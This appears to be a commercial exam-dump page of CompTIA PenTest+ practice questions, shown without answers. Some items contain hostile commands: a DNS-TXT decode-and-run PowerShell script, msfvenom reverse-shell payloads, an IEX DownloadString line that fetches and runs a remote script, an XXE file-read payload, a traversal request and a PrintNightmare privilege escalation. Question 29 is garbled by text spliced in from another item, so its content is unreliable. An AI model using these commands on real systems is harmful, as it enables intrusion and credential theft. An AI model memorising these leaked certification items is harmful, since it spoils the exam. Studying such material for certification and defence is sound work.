Summer Certification Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: clap70

PT0-003 CompTIA PenTest+ Exam Questions and Answers

Questions 4

Which of the following components should a penetration tester include in the final assessment report?

Options:

A.

User activities

B.

Customer remediation plan

C.

Key management

D.

Attack narrative

Buy Now
Questions 5

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?

Options:

A.

FTP

B.

HTTPS

C.

SMTP

D.

DNS

Buy Now
Questions 6

During a vulnerability assessment, a penetration tester finds the following information:

KRBTGT account with more than 1250 days without password change.

Which of the following tools could an attacker use to exploit this vulnerability?

Options:

A.

Mimikatz

B.

John the Ripper

C.

Hashcat

D.

Hydra

Buy Now
Questions 7

Which of the following components should a penetration tester include in an assessment report?

Options:

A.

User activities

B.

Customer remediation plan

C.

Key management

D.

Attack narrative

Buy Now
Questions 8

A penetration tester wants to collect credentials against an organization with a PEAP infrastructure. Which of the following tools should the tester use?

Options:

A.

InSSIDer

B.

HackRF One

C.

WiFi-Pumpkin

D.

Aircrack-ng

Buy Now
Questions 9

During a security assessment, a penetration tester needs to exploit a vulnerability in a wireless network ' s authentication mechanism to gain unauthorized access to the network. Which of the following attacks would the tester most likely perform to gain access?

Options:

A.

KARMA attack

B.

Beacon flooding

C.

MAC address spoofing

D.

Eavesdropping

Buy Now
Questions 10

A penetration tester writes the following script, which is designed to hide communication and bypass some restrictions on a client ' s network:

$base64cmd = Resolve-DnsName foo.comptia.org -Type TXT | Select-Object -ExpandProperty Strings

$decodecmd = [System.Text.Encoding]::UTF8.GetString([System.Convert] ::FromBase64String($base64cmd))

Powershell -C $decodecmd

Which of the following best describes the technique the tester is applying?

Options:

A.

DNS poisoning

B.

DNS infiltration

C.

DNS trail

D.

DNS tunneling

Buy Now
Questions 11

During an assessment, a penetration tester obtains access to an internal server and would like to perform further reconnaissance by capturing LLMNR traffic. Which of the following tools should the tester use?

Options:

A.

Burp Suite

B.

Netcat

C.

Responder

D.

Nmap

Buy Now
Questions 12

A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster. Which of the following tools should the tester use to evaluate the cluster?

Options:

A.

Trivy

B.

Nessus

C.

Grype

D.

Kube-hunter

Buy Now
Questions 13

A client specifies that live packet capture must be conducted between 2:00 a.m. and 6:00 a.m. to prevent potential disruptions to operations. Which of the following tools should the penetration tester use to analyze this information at a later time?

Options:

A.

Maltego

B.

Wayback Machine

C.

Wireshark

D.

Shodan

Buy Now
Questions 14

A penetration tester discovers a deprecated directory in which files are accessible to anyone. Which of the following would most likely assist the penetration tester in finding sensitive information without raising suspicion?

Options:

A.

Enumerating cached pages available on web pages

B.

Looking for externally available services

C.

Scanning for exposed ports associated with the domain

D.

Searching for vulnerabilities and potential exploits

Buy Now
Questions 15

A penetration tester conducts a scan on an exposed Linux web server and gathers the following data:

Host: 192.168.55.23

Open Ports:

22/tcp Open OpenSSH 7.2p2 Ubuntu 4ubuntu2.10

80/tcp Open Apache httpd 2.4.18 (Ubuntu)

111/tcp Open rpcbind 2-4 (RPC #100000)

Additional notes:

Directory listing enabled on /admin

Apache mod_cgi enabled

No authentication required to access /cgi-bin/debug.sh

X-Powered-By: PHP/5.6.40-0+deb8u12

Which of the following is the most effective action to take?

Options:

A.

Launch a payload using msfvenom and upload it to the /admin directory.

B.

Review the contents of /cgi-bin/debug.sh.

C.

Use Nikto to scan the host and port 80.

D.

Attempt a brute-force attack against OpenSSH 7.2p2.

Buy Now
Questions 16

A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization. Which of the following scans should the penetration tester perform?

Options:

A.

SAST

B.

Sidecar

C.

Unauthenticated

D.

Host-based

Buy Now
Questions 17

A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely needed for this task?

Options:

A.

BeEF

B.

John the Ripper

C.

ZAP

D.

Evilginx

Buy Now
Questions 18

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?

Options:

A.

msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443

B.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000

C.

msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 EXITFUNC=none

D.

net user add /administrator | hexdump > payload

Buy Now
Questions 19

A penetration tester is conducting a wireless security assessment for a client with 2.4GHz and 5GHz access points. The tester places a wireless USB dongle in the laptop to start capturing WPA2 handshakes. Which of the following steps should the tester take next?

Options:

A.

Enable monitoring mode using Aircrack-ng.

B.

Use Kismet to automatically place the wireless dongle in monitor mode and collect handshakes.

C.

Run KARMA to break the password.

D.

Research WiGLE.net for potential nearby client access points.

Buy Now
Questions 20

A penetration tester has adversely affected a critical system during an engagement, which could have a material impact on the organization. Which of the following should the penetration tester do to address this issue?

Options:

A.

Restore the configuration.

B.

Perform a BIA.

C.

Follow the escalation process.

D.

Select the target.

Buy Now
Questions 21

During a routine penetration test, the client’s security team observes logging alerts that indicate several ID badges were reprinted after working hours without authorization. Which of the following is the penetration tester most likely trying to do?

Options:

A.

Obtain long-term, valid access to the facility

B.

Disrupt the availability of facility access systems

C.

Change access to the facility for valid users

D.

Revoke access to the facility for valid users

Buy Now
Questions 22

Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

Options:

A.

Removing persistence mechanisms

B.

Uninstalling tools

C.

Preserving artifacts

D.

Reverting configuration changes

Buy Now
Questions 23

A penetration tester needs to quickly transfer an exploit from a Linux system to a Windows 10 system within the network. Which of the following is the best way to accomplish this task?

Options:

A.

nc -lvp 8080

B.

nc -lnvp 443

C.

python3 -m http.server 80

D.

ncat -lvp 9090

Buy Now
Questions 24

A penetration tester needs to complete cleanup activities from the testing lead. Which of the following should the tester do to validate that reverse shell payloads are no longer running?

Options:

A.

Run scripts to terminate the implant on affected hosts.

B.

Spin down the C2 listeners.

C.

Restore the firewall settings of the original affected hosts.

D.

Exit from C2 listener active sessions.

Buy Now
Questions 25

An internal penetration tester is on site assessing network access for company-owned mobile devices. Which of the following would be the best tool to identify the available networks?

Options:

A.

Wireshark

B.

theHarvester

C.

Recon-ng

D.

WiGLE.net

Buy Now
Questions 26

A penetration tester successfully clones a source code repository and then runs the following command:

find . -type f -exec egrep -i " token|key|login " {} \;

Which of the following is the penetration tester conducting?

Options:

A.

Data tokenization

B.

Secrets scanning

C.

Password spraying

D.

Source code analysis

Buy Now
Questions 27

While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?

Options:

A.

Configuration changes were not reverted.

B.

A full backup restoration is required for the server.

C.

The penetration test was not completed on time.

D.

The penetration tester was locked out of the system.

Buy Now
Questions 28

A penetration tester identifies the following open ports during a network enumeration scan:

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

111/tcp open rpcbind

443/tcp open https

27017/tcp open mongodb

50123/tcp open ms-rpc

Which of the following commands did the tester use to get this output?

Options:

A.

nmap -Pn -A 10.10.10.10

B.

nmap -sV 10.10.10.10

C.

nmap -Pn -w 10.10.10.10

D.

nmap -sV -Pn -p- 10.10.10.10

Buy Now
Questions 29

A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following information:

Server High-severity vulnerabilities

1. Development sandbox server 32

2. Back office file transfer server 51

3. Perimeter network web server 14

4. Developer QA server 92

The client is con ble monitoring mode using Aircrack-ng ch of the following hosts should the penetration tester select for additional manual testing?

Options:

A.

Server 1

B.

Server 2

C.

Server 3

D.

Server 4

Buy Now
Questions 30

A penetration tester exports the following CSV data from a scanner. The tester wants to parse the data using Bash and input it into another tool.

CSV data before parsing:

cat data.csv

Host, IP, Username, Password

WINS212, 10.111.41.74, admin, Spring11

HRDB, 10.13.9.212, hradmin, HRForTheWin

WAS01, 192.168.23.13, admin, Snowfall97

Intended output:

admin Spring11

hradmin HRForTheWin

admin Snowfall97

Which of the following will provide the intended output?

Options:

A.

cat data.csv | grep -v " IP " | cut -d " , " -f 3,4 | sed -e ' s/,/ / '

B.

cat data.csv | find . -iname Username,Password

C.

cat data.csv | grep ' username|Password '

D.

cat data.csv | grep -i " admin " | grep -v " WINS212\|HRDB\|WAS01\|10.111.41.74\|10.13.9.212\|192.168.23.13 "

Buy Now
Questions 31

During a security assessment, a penetration tester wants to compromise user accounts without triggering IDS/IPS detection rules. Which of the following is the most effective way for the tester to accomplish this task?

Options:

A.

Crack user accounts using compromised hashes.

B.

Brute force accounts using a dictionary attack.

C.

Bypass authentication using SQL injection.

D.

Compromise user accounts using an XSS attack.

Buy Now
Questions 32

Which of the following describes the process of determining why a vulnerability scanner is not providing results?

Options:

A.

Root cause analysis

B.

Secure distribution

C.

Peer review

D.

Goal reprioritization

Buy Now
Questions 33

A penetration tester obtains a regular domain user ' s set of credentials. The tester wants to attempt a dictionary attack by creating a custom word list based on the Active Directory password policy. Which of the following tools should the penetration tester use to retrieve the password policy?

Options:

A.

Responder

B.

CrackMapExec

C.

Hydra

D.

msfvenom

Buy Now
Questions 34

While conducting an assessment, a penetration tester identifies details for several unreleased products announced at a company-wide meeting.

Which of the following attacks did the tester most likely use to discover this information?

Options:

A.

Eavesdropping

B.

Bluesnarfing

C.

Credential harvesting

D.

SQL injection attack

Buy Now
Questions 35

A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?

Options:

A.

netsh.exe

B.

certutil.exe

C.

nc.exe

D.

cmdkey.exe

Buy Now
Questions 36

A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network. Which of the following techniques would most likely achieve the goal?

Options:

A.

Packet injection

B.

Bluejacking

C.

Beacon flooding

D.

Signal jamming

Buy Now
Questions 37

A penetration tester conducts reconnaissance for a client ' s network and identifies the following system of interest:

$ nmap -A AppServer1.compita.org

Starting Nmap 7.80 (2023-01-14) on localhost (127.0.0.1) at 2023-08-04 15:32:27

Nmap scan report for AppServer1.compita.org (192.168.1.100)

Host is up (0.001s latency).

Not shown: 999 closed ports

Port State Service

21/tcp open ftp

22/tcp open ssh

23/tcp open telnet

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

873/tcp open rsync

8080/tcp open http-proxy

8443/tcp open https-alt

9090/tcp open zeus-admin

10000/tcp open snet-sensor-mgmt

The tester notices numerous open ports on the system of interest. Which of the following best describes this system?

Options:

A.

A honeypot

B.

A Windows endpoint

C.

A Linux server

D.

An already-compromised system

Buy Now
Questions 38

A company hires a penetration tester to test the security implementation of its wireless networks. The main goal for this assessment is to intercept and get access to sensitive data from the company ' s employees. Which of the following tools should the security professional use to best accomplish this task?

Options:

A.

Metasploit

B.

WiFi-Pumpkin

C.

SET

D.

theHarvester

E.

WiGLE.net

Buy Now
Questions 39

A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:

xml

Copy code

< ?xml version= " 1.0 " ? >

< !DOCTYPE data [

< !ENTITY foo SYSTEM " file:///etc/passwd " >

] >

< test > & foo; < /test >

Which of the following should the tester recommend in the report to best prevent this type of vulnerability?

Options:

A.

Drop all excessive file permissions with chmod o-rwx.

B.

Ensure the requests application access logs are reviewed frequently.

C.

Disable the use of external entities.

D.

Implement a WAF to filter all incoming requests.

Buy Now
Questions 40

During the reconnaissance phase, a penetration tester collected the following information from the DNS records:

A----- > www

A----- > host

TXT -- > vpn.comptia.org

SPF--- > ip =2.2.2.2

Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?

Options:

A.

MX

B.

SOA

C.

DMARC

D.

CNAME

Buy Now
Questions 41

A company hires a penetration tester to perform an external attack surface review as part of a security engagement. The company informs the tester that the main company domain to investigate is comptia.org. Which of the following should the tester do to accomplish the assessment objective?

Options:

A.

Perform information-gathering techniques to review internet-facing assets for the company.

B.

Perform a phishing assessment to try to gain access to more resources and users’ computers.

C.

Perform a physical security review to identify vulnerabilities that could affect the company.

D.

Perform a vulnerability assessment over the main domain address provided by the client.

Buy Now
Questions 42

During a web application assessment, a penetration tester identifies an input field that allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt, presenting a text box when browsing to the page going forward. Which of the following types of attacks is this an example of?

Options:

A.

SQL injection

B.

SSRF

C.

XSS

D.

Server-side template injection

Buy Now
Questions 43

A penetration tester downloads a JAR file that is used in an organization ' s production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester ' s activities?

Options:

A.

SAST

B.

SBOM

C.

ICS

D.

SCA

Buy Now
Questions 44

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?

Options:

A.

regsvr32 /s /n /u C:\evil.xml

B.

MSBuild.exe C:\evil.xml

C.

mshta.exe C:\evil.xml

D.

AppInstaller.exe C:\evil.xml

Buy Now
Questions 45

A penetration tester wants to send a specific network packet with custom flags and sequence numbers to a vulnerable target. Which of the following should the tester use?

Options:

A.

tcprelay

B.

Bluecrack

C.

Scapy

D.

tcpdump

Buy Now
Questions 46

During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be considered in this scope of work?

Options:

A.

Segmentation

B.

Mobile

C.

External

D.

Web

Buy Now
Questions 47

A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering. Which of the following types of scans did the tester use to identify the libraries?

Options:

A.

IAST

B.

SBOM

C.

DAST

D.

SAST

Buy Now
Questions 48

A penetration tester assesses an application allow list and has limited command-line access on the Windows system. Which of the following would give the penetration tester information that could aid in continuing the test?

Options:

A.

mmc.exe

B.

icacls.exe

C.

nltest.exe

D.

rundll.exe

Buy Now
Questions 49

During a preengagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?

Options:

A.

API

B.

HTTP

C.

IPA

D.

ICMP

Buy Now
Questions 50

During an assessment, a penetration tester manages to get RDP access via a low-privilege user. The tester attempts to escalate privileges by running the following commands:

Import-Module .\PrintNightmare.ps1

Invoke-Nightmare -NewUser " hacker " -NewPassword " Password123! " -DriverName " Print "

The tester attempts to further enumerate the host with the new administrative privileges by using the runas command. However, the access level is still low. Which of the following actions should the penetration tester take next?

Options:

A.

Log off and log on with " hacker " .

B.

Attempt to add another user.

C.

Bypass the execution policy.

D.

Add a malicious printer driver.

Buy Now
Questions 51

A previous penetration test report identified a host with vulnerabilities that was

successfully exploited. Management has requested that an internal member of the

security team reassess the host to determine if the vulnerability still exists.

Part 1:

. Analyze the output and select the command to exploit the vulnerable service.

Part 2:

. Analyze the output from each command.

· Select the appropriate set of commands to escalate privileges.

· Identify which remediation steps should be taken.

Options:

Buy Now
Questions 52

A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application, the tester opens a terminal window and gains access to the underlying operating system. Which of the following attacks is the tester performing?

Options:

A.

Kiosk escape

B.

Arbitrary code execution

C.

Process hollowing

D.

Library injection

Buy Now
Questions 53

Which of the following is the most efficient way to exfiltrate a file containing data that could be sensitive?

Options:

A.

Use steganography and send the file over FTP.

B.

Compress the file and send it using TFTP.

C.

Split the file in tiny pieces and send it over dnscat.

D.

Encrypt and send the file over HTTPS.

Buy Now
Questions 54

A penetration tester obtains password dumps associated with the target and identifies strict lockout policies. The tester does not want to lock out accounts when attempting access. Which of the following techniques should the tester use?

Options:

A.

Credential stuffing

B.

MFA fatigue

C.

Dictionary attack

D.

Brute-force attack

Buy Now
Questions 55

During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services. Which of the following tools is best for this task?

Options:

A.

WiGLE.net

B.

WHOIS

C.

theHarvester

D.

Censys.io

Buy Now
Questions 56

Which of the following is most important when communicating the need for vulnerability remediation to a client at the conclusion of a penetration test?

Options:

A.

Articulation of cause

B.

Articulation of impact

C.

Articulation of escalation

D.

Articulation of alignment

Buy Now
Questions 57

A penetration tester compromises a Windows OS endpoint that is joined to an Active Directory local environment. Which of the following tools should the tester use to manipulate authentication mechanisms to move laterally in the network?

Options:

A.

Rubeus

B.

WinPEAS

C.

NTLMRelayX

D.

Impacket

Buy Now
Questions 58

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client ' s networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?

Options:

A.

Covert data exfiltration

B.

URL spidering

C.

HTML scrapping

D.

DoS attack

Buy Now
Questions 59

While performing an internal assessment, a tester uses the following command:

crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@

Which of the following is the main purpose of the command?

Options:

A.

To perform a pass-the-hash attack over multiple endpoints within the internal network

B.

To perform common protocol scanning within the internal network

C.

To perform password spraying on internal systems

D.

To execute a command in multiple endpoints at the same time

Buy Now
Questions 60

During an internal penetration test, a tester compromises a Windows OS-based endpoint and bypasses the defensive mechanisms. The tester also discovers that the endpoint is part of an Active Directory (AD) local domain.

The tester’s main goal is to leverage credentials to authenticate into other systems within the Active Directory environment.

Which of the following steps should the tester take to complete the goal?

Options:

A.

Use Mimikatz to collect information about the accounts and try to authenticate in other systems

B.

Use Hashcat to crack a password for the local user on the compromised endpoint

C.

Use Evil-WinRM to access other systems in the network within the endpoint credentials

D.

Use Metasploit to create and execute a payload and try to upload the payload into other systems

Buy Now
Questions 61

A penetration tester gains access to a domain server and wants to enumerate the systems within the domain. Which of the following tools would provide the best oversight of domains?

Options:

A.

Netcat

B.

Wireshark

C.

Nmap

D.

Responder

Buy Now
Questions 62

During a web application assessment, a penetration tester accesses the site unauthenticated and receives the following Set-Cookie on the first response:

auth=yYKGORbrpabgr842ajbvrpbptau42342

When the tester logs in, the server sends only one Set-Cookie header, and the value is exactly the same as shown above. Which of the following vulnerabilities has the tester discovered?

Options:

A.

JWT manipulation

B.

Cookie poisoning

C.

Session fixation

D.

Collision attack

Buy Now
Questions 63

During an assessment on a client that uses virtual desktop infrastructure in the cloud, a penetration tester gains access to a host and runs commands. The penetration tester receives the following output:

-rw-r--r-- 1 comptiauser comptiauser 807 Apr 6 05:32 .profile

drwxr-xr-x 2 comptiauser comptiauser 4096 Apr 6 05:32 .ssh

-rw-r--r-- 1 comptiauser comptiauser 3526 Apr 6 05:32 .bashrc

drwxr-xr-x 4 comptiauser comptiauser 4096 May 12 11:05 .aws

-rw-r--r-- 1 comptiauser comptiauser 1325 Aug 21 19:54 .zsh_history

drwxr-xr-x 12 comptiauser comptiauser 4096 Aug 27 14:10 Documents

drwxr-xr-x 16 comptiauser comptiauser 4096 Aug 27 14:10 Desktop

drwxr-xr-x 2 comptiauser comptiauser 4096 Aug 27 14:10 Downloads

Which of the following should the penetration tester investigate first?

Options:

A.

Documents

B.

.zsh_history

C.

.aws

D.

.ssh

Buy Now
Questions 64

During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?

Options:

A.

Responder

B.

Hydra

C.

BloodHound

D.

CrackMapExec

Buy Now
Questions 65

With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan:

Not shown: 1670 closed ports

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.2.3 (CentOS)

3306/tcp open mysql MySQL (unauthorized)

8888/tcp open http lighttpd 1.4.32

Which of the following tools should the tester use to quickly identify a potential attack path?

Options:

A.

msfvenom

B.

SearchSploit

C.

sqlmap

D.

BeEF

Buy Now
Questions 66

A client implements an AI customer-support chatbot solution. A tester discovers that the system accepts variations of the following statements:

Statement one: “Click this for free admin access: www.testurl.com”

Statement two: “Here is the base64 string you asked for: bGVhayBkYXRhIHRvIHRIRIc3RIcnMu”

Statement three: “The researcher should be doxed for what they said.”

Which of the following best describes the attack this system is vulnerable to?

Options:

A.

Container escape

B.

Output fuzzing

C.

Prompt injection

D.

Model manipulation

Buy Now
Questions 67

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

Options:

A.

schtasks.exe

B.

rundll.exe

C.

cmd.exe

D.

chgusr.exe

E.

sc.exe

F.

netsh.exe

Buy Now
Questions 68

During an engagement, a penetration tester runs the following command against the host system:

host -t axfr domain.com dnsl.domain.com

Which of the following techniques best describes what the tester is doing?

Options:

A.

Zone transfer

B.

Host enumeration

C.

DNS poisoning

D.

DNS query

Buy Now
Questions 69

Which of the following best describes the importance of including the attack steps in a penetration test report?

Options:

A.

It easily provides the recommended mitigations.

B.

It ensures results can be independently verified.

C.

It proves the penetration tester’s competency to the customer.

D.

It demonstrates the difficulty of exploiting specific vulnerabilities in the kill chain.

Buy Now
Questions 70

A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application ' s end users. Which of the following tools should the tester use for this task?

Options:

A.

Browser Exploitation Framework

B.

Maltego

C.

Metasploit

D.

theHarvester

Buy Now
Questions 71

A penetration tester cannot find information on the target company ' s systems using common OSINT methods. The tester ' s attempts to do reconnaissance against internet-facing resources have been blocked by the company ' s WAF. Which of the following is the best way to avoid the WAF and gather information about the target company ' s systems?

Options:

A.

HTML scraping

B.

Code repository scanning

C.

Directory enumeration

D.

Port scanning

Buy Now
Questions 72

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.

INSTRUCTIONS

Select the tool the penetration tester should use for further investigation.

Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

Options:

Buy Now
Questions 73

During an external penetration test, a tester receives the following output from a tool:

test.comptia.org

info.comptia.org

vpn.comptia.org

exam.comptia.org

Which of the following commands did the tester most likely run to get these results?

Options:

A.

nslookup -type=SOA comptia.org

B.

amass enum -passive -d comptia.org

C.

nmap -Pn -sV -vv -A comptia.org

D.

shodan host comptia.org

Buy Now
Questions 74

A penetration testing company is defining the rules of engagement with a client. Which of the following should the company include?

Options:

A.

Non-disclosure agreement

B.

Escalation process

C.

URL list

D.

Authorization letter

Buy Now
Questions 75

A Chief Information Security Officer wants to automate adversarial activities from penetration tests that are relevant to the organization. Which of the following should a penetration tester do first to accomplish this task?

Options:

A.

Deploy a command-and-control server with custom profiles to facilitate execution.

B.

Use Python 3 with added testing libraries and script the relevant action to test.

C.

Utilize the PowerShell PowerView tool with custom scripting additions based on test results.

D.

Implement Atomic Red Team to chain critical TTPs and perform the test.

Buy Now
Questions 76

A penetration tester wants to perform static analysis of a Java application. The tester has a copy of the archive file. Which of the following must the tester do first to accomplish this goal?

Options:

A.

Decompile the bytecode.

B.

Perform a fuzz test the archive file.

C.

Convert the archive file to a .so file.

D.

Disassemble the Java interpreter.

Buy Now
Questions 77

Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?

Options:

A.

Latches

B.

Pins

C.

Shackle

D.

Plug

Buy Now
Questions 78

A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:

line 1: #!/usr/bin/bash

line 2: DOMAINS_LIST = " /path/to/list.txt "

line 3: while read -r i; do

line 4: nikto -h $i -o scan-$i.txt &

line 5: done

The script does not work as intended. Which of the following should the tester do to fix the script?

Options:

A.

Change line 2 to { " domain1 " , " domain2 " , " domain3 " , }.

B.

Change line 3 to while true; read -r i; do.

C.

Change line 4 to nikto $i | tee scan-$i.txt.

D.

Change line 5 to done < " $DOMAINS_LIST " .

Buy Now
Questions 79

During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?

Options:

A.

certutil.exe

B.

bitsadmin.exe

C.

msconfig.exe

D.

netsh.exe

Buy Now
Questions 80

Which of the following scenarios would most likely lead a client to reprioritize goals after a penetration test begins?

Options:

A.

An end-of-life web server is decommissioned.

B.

A new zero-day vulnerability is publicly disclosed.

C.

The penetration tester is not capturing artifacts for an exploited vulnerability.

D.

A new lead penetration tester is assigned to the project.

Buy Now
Questions 81

During a penetration test, the tester uses a vulnerability scanner to collect information about any possible vulnerabilities that could be used to compromise the network. The tester receives the results and then executes the following command:

snmpwalk -v 2c -c public 192.168.1.23

Which of the following is the tester trying to do based on the command they used?

Options:

A.

Bypass defensive systems to collect more information.

B.

Use an automation tool to perform the attacks.

C.

Script exploits to gain access to the systems and host.

D.

Validate the results and remove false positives.

Buy Now
Questions 82

During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?

Options:

A.

sqlmap -u www.example.com/?id=1 --search -T user

B.

sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

C.

sqlmap -u www.example.com/?id=1 --tables -D accounts

D.

sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

Buy Now
Questions 83

A penetration tester wants to expand access into a network by enumerating users and credentials. The tester runs some tools for enumeration and captures the following information:

[SMB] Client: 10.203.10.14

[SMB] Username: comptiaadmin

[SMB] Hash: 10.203.20.16:a96409231c099f17

Which of the following steps should the penetration tester take next?

Options:

A.

Use Hydra to brute-force passwords with the captured username.

B.

Utilize the auxiliary/server/http_ntlmrelay module in Metasploit.

C.

Perform a secretsdump with Impacket using the NTLM digest.

D.

Load the hash information into John the Ripper for cracking.

Buy Now
Questions 84

Given the following statements:

Implement a web application firewall.

Upgrade end-of-life operating systems.

Implement a secure software development life cycle.

In which of the following sections of a penetration test report would the above statements be found?

Options:

A.

Executive summary

B.

Attack narrative

C.

Detailed findings

D.

Recommendations

Buy Now
Questions 85

A penetration tester needs to collect information over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?

Options:

A.

ntlmrelayx.py -t 192.168.1.0/24 -1 1234

B.

nc -tulpn 1234 192.168.1.2

C.

responder.py -I eth0 -wP

D.

crackmapexec smb 192.168.1.0/24

Buy Now
Questions 86

A penetration tester must gain entry to a client ' s office building without raising attention. Which of the following should be the tester ' s first step?

Options:

A.

Interacting with security employees to clone a badge

B.

Trying to enter the back door after hours on a weekend

C.

Collecting building blueprints to run a site survey

D.

Conducting surveillance of the office to understand foot traffic

Buy Now
Questions 87

A penetration tester wants to use the following Bash script to identify active servers on a network:

1 network_addr= " 192.168.1 "

2 for h in {1..254}; do

3 ping -c 1 -W 1 $network_addr.$h > /dev/null

4 if [ $? -eq 0 ]; then

5 echo " Host $h is up "

6 else

7 echo " Host $h is down "

8 fi

9 done

Which of the following should the tester do to modify the script?

Options:

A.

Change the condition on line 4.

B.

Add 2 > & 1 at the end of line 3.

C.

Use seq on the loop on line 2.

D.

Replace $h with ${h} on line 3.

Buy Now
Questions 88

A penetration tester finds it is possible to downgrade a web application ' s HTTPS connections to HTTP while performing on-path attacks on the local network. The tester reviews the output of the server response to:

curl -s -i https://internalapp/

HTTP/2 302

date: Thu, 11 Jan 2024 15:56:24 GMT

content-type: text/html; charset=iso-8659-1

location: /login

x-content-type-options: nosniff

server: Prod

Which of the following recommendations should the penetration tester include in the report?

Options:

A.

Add the HSTS header to the server.

B.

Attach the httponly flag to cookies.

C.

Front the web application with a firewall rule to block access to port 80.

D.

Remove the x-content-type-options header.

Buy Now
Questions 89

A penetration tester completes a scan and sees the following Nmap output on a host:

Nmap scan report for victim (10.10.10.10)

Host is up (0.0001s latency)

PORT STATE SERVICE

161/udp open snmp

445/tcp open microsoft-ds

3389/tcp open ms-wbt-server

Running Microsoft Windows 7

OS CPE: cpe:/o:microsoft:windows_7::sp0

The tester wants to obtain shell access. Which of the following related exploits should the tester try first?

Options:

A.

exploit/windows/smb/psexec

B.

exploit/windows/smb/ms08_067_netapi

C.

exploit/windows/smb/ms17_010_eternalblue

D.

auxiliary/scanner/snmp/snmp_login

Buy Now
Questions 90

A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?

Options:

A.

nmap -sU -sW -p 1-65535 example.com

B.

nmap -sU -sY -p 1-65535 example.com

C.

nmap -sU -sT -p 1-65535 example.com

D.

nmap -sU -sN -p 1-65535 example.com

Buy Now
Questions 91

A penetration tester is trying to get unauthorized access to a web application and executes the following command:

GET /foo/images/file?id=2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

Which of the following web application attacks is the tester performing?

Options:

A.

Insecure Direct Object Reference

B.

Cross-Site Request Forgery

C.

Directory Traversal

D.

Local File Inclusion

Buy Now
Questions 92

During an assessment, a penetration tester wants to extend the vulnerability search to include the use of dynamic testing. Which of the following tools should the tester use?

Options:

A.

Mimikatz

B.

ZAP

C.

OllyDbg

D.

SonarQube

Buy Now
Questions 93

Given the following script:

$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split( " \ " )[1]

If ($1 -eq " administrator " ) {

echo IEX(New-Object Net.WebClient).Downloadstring( ' http://10.10.11.12:8080/ul/windows.ps1 ' ) | powershell -noprofile -}

Which of the following is the penetration tester most likely trying to do?

Options:

A.

Change the system ' s wallpaper based on the current user ' s preferences.

B.

Capture the administrator ' s password and transmit it to a remote server.

C.

Conditionally stage and execute a remote script.

D.

Log the internet browsing history for a systems administrator.

Buy Now
Questions 94

A penetration tester successfully gains access to a Linux system and then uses the following command:

find / -type f -ls > /tmp/recon.txt

Which of the following best describes the tester’s goal?

Options:

A.

Permission enumeration

B.

Secrets enumeration

C.

User enumeration

D.

Service enumeration

Buy Now
Questions 95

